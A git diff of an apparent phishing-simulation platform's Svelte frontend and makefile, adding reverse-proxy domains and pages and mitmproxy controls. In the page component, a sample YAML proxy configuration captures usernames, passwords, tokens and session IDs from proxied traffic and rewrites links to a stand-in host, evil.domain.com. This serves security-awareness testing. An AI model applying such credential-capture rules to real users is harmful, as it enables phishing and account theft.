if not hosting a website - if (!formValues.hostWebsite) { + // clear site contents if not hosting a website or if proxy domain + if (!formValues.hostWebsite || isProxyDomain) { formValues.pageContent = ''; formValues.pageNotFoundContent = ''; } try { - const res = await api.domain.update({ - id: formValues.id, - managedTLS: formValues.managedTLS, - ownManagedTLS: formValues.ownManagedTLS, - ownManagedTLSKey: formValues.ownManagedTLSKey, - ownManagedTLSPem: formValues.ownManagedTLSPem, - hostWebsite: formValues.hostWebsite, - pageContent: formValues.pageContent, - pageNotFoundContent: formValues.pageNotFoundContent, - redirectURL: formValues.redirectURL, - companyID: contextCompanyID - }); + // prepare complete update data + let updateData; + + if (isProxyDomain) { + // for proxy domains, only send TLS-related fields + updateData = { + id: formValues.id, + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + companyID: contextCompanyID + }; + } else { + // for regular domains, send all fields + updateData = { + id: formValues.id, + type: 'regular', + proxyTargetDomain: '', + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + hostWebsite: formValues.hostWebsite, + pageContent: formValues.pageContent, + pageNotFoundContent: formValues.pageNotFoundContent, + redirectURL: formValues.redirectURL, + companyID: contextCompanyID + }; + } + + // @ts-ignore + const res = await api.domain.update(updateData); if (!res.success) { modalError = res.error; return; @@ -349,6 +400,12 @@ showIsLoading(); try { const domain = await getDomain(id); + + // prevent opening modal for proxy domains (except for TLS settings) + if (domain.type === 'proxy') { + // Allow opening for TLS settings only + } + formValues = { id: domain.id, name: 
domain.name, @@ -362,6 +419,10 @@ redirectURL: domain.redirectURL, staticContent: domain.staticContent }; + + // Store domain object for proxy info display + currentDomain = domain; + const r = globalButtonDisabledAttributes(domain, contextCompanyID); if (r.disabled) { hideIsLoading(); @@ -383,13 +444,22 @@ const openUpdateContentModal = async (id) => { modalMode = 'update'; showIsLoading(); + try { const domain = await getDomain(id); + + // prevent opening modal for proxy domains + if (domain.type === 'proxy') { + addToast('Proxy domains cannot be edited - managed through proxy configuration', 'Error'); + hideIsLoading(); + return; + } + assignDomainValues(domain); isUpdateContentModalVisible = true; } catch (e) { addToast('Failed to load domain', 'Error'); - console.error('failed to load domain', e); + console.error('failed to get domain', e); } finally { hideIsLoading(); } @@ -426,6 +496,8 @@ redirectURL: domain.redirectURL, staticContent: domain.staticContent }; + // Store domain object for proxy info display + currentDomain = domain; }; const closeAllModals = () => { @@ -441,7 +513,7 @@ if (contentNotFoundForm) { contentNotFoundForm.reset(); } - isModalVisible = false; + // reset content formValues = { id: null, name: null, @@ -451,12 +523,15 @@ ownManagedTLSPem: null, hostWebsite: true, pageContent: '', // default value - pageNotFoundContent: '404 page not found', // default value - redirectURL: '' + pageNotFoundContent: '', // default value + redirectURL: '', + staticContent: '' }; + currentDomain = null; + isModalVisible = false; - isUpdateNotFoundModalVisible = false; isUpdateContentModalVisible = false; + isUpdateNotFoundModalVisible = false; isCopyContentModalVisible = false; }; @@ -468,6 +543,14 @@ showIsLoading(); try { const domain = await getDomain(id); + + // prevent opening modal for proxy domains + if (domain.type === 'proxy') { + addToast('Proxy domains cannot be edited - managed through proxy configuration', 'Error'); + hideIsLoading(); + 
return; + } + formValues = { id: domain.id, name: domain.name, @@ -478,18 +561,28 @@ hostWebsite: domain.hostWebsite, pageContent: domain.pageContent, pageNotFoundContent: domain.pageNotFoundContent, - redirectURL: domain.redirectURL + redirectURL: domain.redirectURL, + staticContent: domain.staticContent }; isUpdateNotFoundModalVisible = true; } catch (e) { addToast('Failed to load domain', 'Error'); - console.error('failed to load domain', e); + console.error('failed to get domain', e); } finally { hideIsLoading(); } }; const openDeleteAlert = async (domain) => { + // prevent deletion of proxy domains + if (domain.type === 'proxy') { + addToast( + 'Proxy domains can only be deleted by deleting the associated proxy configuration', + 'Error' + ); + return; + } + isDeleteAlertVisible = true; deleteValues.id = domain.id; deleteValues.name = domain.name; @@ -522,9 +615,11 @@ { column: 'Hosting website', size: 'small', alignText: 'center' }, { column: 'Redirects', size: 'small', alignText: 'center' }, { column: 'Managed TLS', size: 'small', alignText: 'center' }, - { column: 'Custom Certificates', size: 'small', alignText: 'center' } + { column: 'Custom Certificates', size: 'small', alignText: 'center' }, + { column: 'Type', size: 'small', alignText: 'center' }, + { column: 'Target Domain', size: 'small' } ]} - sortable={['Name', 'Hosting website', 'Redirects']} + sortable={['Name', 'Hosting website', 'Redirects', 'Type']} hasData={!!domains.length} plural="domains" pagination={tableURLParams} @@ -541,13 +636,26 @@ title={domain.name} class="block w-full py-1 text-left" > - {domain.name} + {#if domain.type === 'proxy'} + {/if}{domain.name} + +
+ + {#if domain.type === 'proxy'} + + {:else} + 📄 + {/if} + +
+
+ {domain.type === 'proxy' ? domain.proxyTargetDomain : ''} @@ -562,21 +670,39 @@ on:click={() => openUpdateModal(domain.id)} {...globalButtonDisabledAttributes(domain, contextCompanyID)} /> - openUpdateContentModal(domain.id)} - {...globalButtonDisabledAttributes(domain, contextCompanyID)} - /> - openUpdateNotFoundContentModal(domain.id)} - {...globalButtonDisabledAttributes(domain, contextCompanyID)} - /> - openCopyModal(domain.id)} /> - openDeleteAlert(domain)} - {...globalButtonDisabledAttributes(domain, contextCompanyID)} - > + {#if domain.type !== 'proxy'} + openUpdateContentModal(domain.id)} + {...globalButtonDisabledAttributes(domain, contextCompanyID)} + /> + openUpdateNotFoundContentModal(domain.id)} + {...globalButtonDisabledAttributes(domain, contextCompanyID)} + /> + openCopyModal(domain.id)} /> + openDeleteAlert(domain)} + {...globalButtonDisabledAttributes(domain, contextCompanyID)} + > + {:else} + + + + + {/if} gotoDomainAssets(domain.name)} /> @@ -608,34 +734,36 @@ placeholder="example.com">Domain - + {#if !isProxyDomain} + - {#if !formValues.hostWebsite} - Redirect URL + {#if !formValues.hostWebsite} + Redirect URL + {/if} {/if}
- +

- SSL Configuration + TLS Configuration

+ diff --git a/frontend/src/routes/page/+page.svelte b/frontend/src/routes/page/+page.svelte index 2da9d27..5d3e923 100644 --- a/frontend/src/routes/page/+page.svelte +++ b/frontend/src/routes/page/+page.svelte @@ -18,6 +18,7 @@ import TableCellAction from '$lib/components/table/TableCellAction.svelte'; import Modal from '$lib/components/Modal.svelte'; import FormGrid from '$lib/components/FormGrid.svelte'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import BigButton from '$lib/components/BigButton.svelte'; import FormColumns from '$lib/components/FormColumns.svelte'; import FormColumn from '$lib/components/FormColumn.svelte'; @@ -33,6 +34,7 @@ import { fetchAllRows } from '$lib/utils/api-utils'; import { BiMap } from '$lib/utils/maps'; import AutoRefresh from '$lib/components/AutoRefresh.svelte'; + import SimpleCodeEditor from '$lib/components/editor/SimpleCodeEditor.svelte'; // services const appStateService = AppStateService.instance; @@ -42,7 +44,10 @@ let formValues = { id: null, name: null, - content: null + content: null, + type: 'regular', + targetURL: null, + proxyConfig: null }; let isSubmitting = false; @@ -63,6 +68,54 @@ name: null }; + // proxy example configuration - simplified to only capture and replacement rules + const proxyExample = `capture: + - name: 'login credentials' + method: 'POST' # optional, default GET + path: '/login' # regex path pattern - matches /login exactly + find: 'username=([^&]+)&password=([^&]+)' # REQUIRED - regex pattern to capture data + from: 'request_body' # where to capture from: request_body, request_header, response_body, response_header, any + # required: true # default - all captures are required unless explicitly set to false + + - name: 'has completed login' + method: 'GET' + path: '/secure' # navigation tracking - just checks if user visited this path + # no find pattern needed for path-based navigation tracking + # required: true # default - user must visit /secure before campaign 
progresses + + - name: 'form submission' + method: 'POST' + path: '/submit-data' # tracks POST requests to this endpoint + # no find pattern needed - just tracking that the form was submitted + + - name: 'profile update' + method: 'PUT' + path: '/api/profile' # tracks PUT requests for profile updates + # navigation tracking works with any HTTP method + + - name: 'api tokens' + path: '/api/v\\d+/auth.*' # regex - matches /api/v1/auth, /api/v2/auth/token, etc. + find: 'token=([a-zA-Z0-9]+)' # REQUIRED - all captures must have a find pattern + from: 'response_body' + + - name: 'optional tracking data' + path: '^/dashboard' # regex - matches paths starting with /dashboard + find: 'session_id=([a-f0-9]+)' # REQUIRED - find pattern is mandatory + from: 'response_header' + required: false # explicitly mark as optional - campaign will progress without this + +replace: + - name: 'replace logo' + find: 'https://target\\.example\\.com/logo\\.png' + replace: 'https://evil.domain.com/assets/logo.png' + + - name: 'replace links' + find: 'href="([^"]*target\\.example\\.com[^"]*)"' + replace: 'href="https://evil.domain.com$1"'`; + + $: isRegularPage = formValues.type === 'regular'; + $: isProxyPage = formValues.type === 'proxy'; + $: { modalText = getModalText('page', modalMode); } @@ -156,7 +209,20 @@ const create = async () => { try { - const res = await api.page.create(formValues.name, formValues.content, contextCompanyID); + const pageData = { + name: formValues.name, + type: formValues.type, + content: isRegularPage ? formValues.content : null, + targetURL: isProxyPage ? formValues.targetURL : null, + proxyConfig: isProxyPage ? 
formValues.proxyConfig : null + }; + + const res = await api.page.create( + pageData.name, + pageData.content, + contextCompanyID, + pageData + ); if (!res.success) { formError = res.error; return; @@ -172,10 +238,15 @@ const update = async () => { try { - const res = await api.page.update(formValues.id, { + const updateData = { name: formValues.name, - content: formValues.content - }); + type: formValues.type, + content: isRegularPage ? formValues.content : null, + targetURL: isProxyPage ? formValues.targetURL : null, + proxyConfig: isProxyPage ? formValues.proxyConfig : null + }; + + const res = await api.page.update(formValues.id, updateData); if (!res.success) { formError = res.error; return; @@ -217,6 +288,9 @@ formValues.content = ''; formValues.name = ''; formValues.id = ''; + formValues.type = 'regular'; + formValues.targetURL = ''; + formValues.proxyConfig = ''; form.reset(); formError = ''; }; @@ -226,6 +300,17 @@ modalMode = 'update'; refreshAllDomains(); showIsLoading(); + + // Reset form values first + formValues = { + id: null, + name: null, + content: null, + type: 'regular', + targetURL: null, + proxyConfig: null + }; + try { const page = await getPage(id); const r = globalButtonDisabledAttributes(page, contextCompanyID); @@ -234,8 +319,8 @@ return; } - isModalVisible = true; assignPage(page); + isModalVisible = true; } catch (e) { addToast('Failed to load page', 'Error'); console.error('failed to get page', e); @@ -247,11 +332,22 @@ const openCopyModal = async (id) => { modalMode = 'copy'; showIsLoading(); + + // Reset form values first + formValues = { + id: null, + name: null, + content: null, + type: 'regular', + targetURL: null, + proxyConfig: null + }; + try { const page = await getPage(id); - isModalVisible = true; assignPage(page); - page.id = null; + formValues.id = null; // Clear ID for copy + isModalVisible = true; } catch (e) { addToast('Failed to load page', 'Error'); console.error('failed to get page', e); @@ -269,7 +365,10 @@ const 
assignPage = (page) => { formValues.id = page.id; formValues.name = page.name; - formValues.content = page.content; + formValues.content = page.content || ''; + formValues.type = page.type && page.type.trim() !== '' ? page.type : 'regular'; + formValues.targetURL = page.targetURL || ''; + formValues.proxyConfig = page.proxyConfig || ''; }; /** @param {*} event */ @@ -341,18 +440,115 @@ - -
- Name +
+ +
+

+ Basic Information +

+
+
+ Name +
+
+
+
+
+

+ Type +

+
+
+ + +
+
+
+
+
- - + + +
+

+ {#if isProxyPage} + Proxy Configuration + {:else} + Page Content + {/if} +

+ + {#if isRegularPage} + + {/if} + + {#if isProxyPage} +
+
+
+

+ Proxy Capture & Replacement Rules (YAML) +

+
+ Data captures require a 'find' pattern. Path-based navigation tracking (any + method) doesn't need 'find'. All captures are required by default. +
+
+
+ +
+
+
+ {/if} +
+ + +
+ diff --git a/frontend/src/routes/proxy/+page.svelte b/frontend/src/routes/proxy/+page.svelte new file mode 100644 index 0000000..dd0fc6f --- /dev/null +++ b/frontend/src/routes/proxy/+page.svelte @@ -0,0 +1,467 @@ + + + +
+
+ Proxies + { + refreshProxies(false); + }} + /> +
+ New Proxy + + {#each proxies as proxy} + + + + + + {proxy.startURL} + + + + + openUpdateModal(proxy.id)} + {...globalButtonDisabledAttributes(proxy, contextCompanyID)} + /> + openCopyModal(proxy.id)} /> + openDeleteAlert(proxy)} + {...globalButtonDisabledAttributes(proxy, contextCompanyID)} + > + + + + {/each} +
+ + +
+ +
+

+ Basic Information +

+
+
+ Name +
+
+ Start URL +
+
+
+ Description +
+
+ + +
+
+
+

+ Proxy Configuration +

+
+ +
+
+
+
+ + +
+ + +
+
+ onClickDelete(deleteValues.id)} + bind:isVisible={isDeleteAlertVisible} + > +
diff --git a/makefile b/makefile
index d4fb626..dae715d 100644
--- a/makefile
+++ b/makefile
@@ -1,6 +1,6 @@
-.PHONY: build down up fix-tls backend-purge backend-down purge logs backend-password
+.PHONY: build down up fix-tls backend-purge backend-down purge logs backend-password dbgate-down dbgate-up
 up:
-	sudo docker compose up -d backend frontend api-test-server pebble dbgate mailer dozzle stats dns test; \
+	sudo docker compose up -d backend frontend api-test-server pebble dbgate mailer dozzle stats dns test mitmproxy; \
 	sudo docker compose logs -f --tail 1000 backend frontend;
 down:
 	-sudo docker compose down --remove-orphans
@@ -49,11 +49,13 @@ backend-reset:
 	sudo docker compose up -d backend; \
 	sudo docker compose logs -f --tail 1000 backend;
 backend-db-reset:
+	sudo docker compose stop dbgate; \
 	sudo rm -f ./backend/.dev/db.sqlite3; \
 	sudo docker compose exec backend bash -c "rm -rf /app/.dev/db.sqlite3";
 	sudo docker compose stop backend; \
 	sudo rm -rf ./backend/.dev/*
 	touch -c ./backend/.dev/db.sqlite3; \
+	sudo docker compose start dbgate; \
 	sudo docker compose up -d backend;
 backend-password:
 	@echo "Finding password"; sudo docker compose logs backend | grep -F "Password:" | tail -n 1
@@ -77,7 +79,11 @@ frontend-logs:
 # dbgate
 dbgate-restart:
-	sudo docker compose restart dbgate; \
+	sudo docker compose restart dbgate;
+dbgate-up:
+	sudo docker compose start dbgate;
+dbgate-down:
+	sudo docker compose stop dbgate;
 # pebble
 pebble-attach:
@@ -126,3 +132,32 @@ dozzle-logs:
 	sudo docker compose logs -f --tail 1000 dozzle
 dozzle-restart:
 	sudo docker compose restart dozzle
+
+# mitmproxy
+mitmproxy-logs:
+	sudo docker compose logs -f --tail 1000 mitmproxy
+mitmproxy-restart:
+	sudo docker compose restart mitmproxy
+mitmproxy-up:
+	sudo docker compose up -d mitmproxy
+mitmproxy-down:
+	sudo docker compose stop mitmproxy
+mitmproxy-attach:
+	sudo docker compose exec mitmproxy sh
+mitmproxy-reset:
+	sudo docker compose stop mitmproxy; \
+	sudo docker compose rm -f mitmproxy; \
+	sudo docker compose up -d mitmproxy; \
+	sudo docker compose logs -f --tail 1000 mitmproxy;
+mitmproxy-token:
+	sudo docker compose logs mitmproxy | grep -i "web server listening" | tail -1 || echo "Token not found - try: make mitmproxy-logs"
+mitmproxy-password:
+	@echo "Latest mitmproxy password/token:"; sudo docker compose logs mitmproxy | grep -oE "token=[a-zA-Z0-9]+" | tail -1 | cut -d= -f2 || echo "Password not found - make sure mitmproxy is running"
+mitmproxy-url:
+	@echo "mitmproxy web interface URL:"; sudo docker compose logs mitmproxy | grep -oE "http://0\.0\.0\.0:8080/\?token=[a-zA-Z0-9]+" | tail -1 | sed 's/0\.0\.0\.0:8080/localhost:8105/' || echo "URL not found - make sure mitmproxy is running"
+mitmproxy-purge:
+	sudo docker compose stop mitmproxy; \
+	sudo docker compose rm -f mitmproxy; \
+	sudo docker volume rm -f phishingclub_mitmproxy_data; \
+	sudo docker compose up -d mitmproxy; \
+	sudo docker compose logs -f --tail 1000 mitmproxy;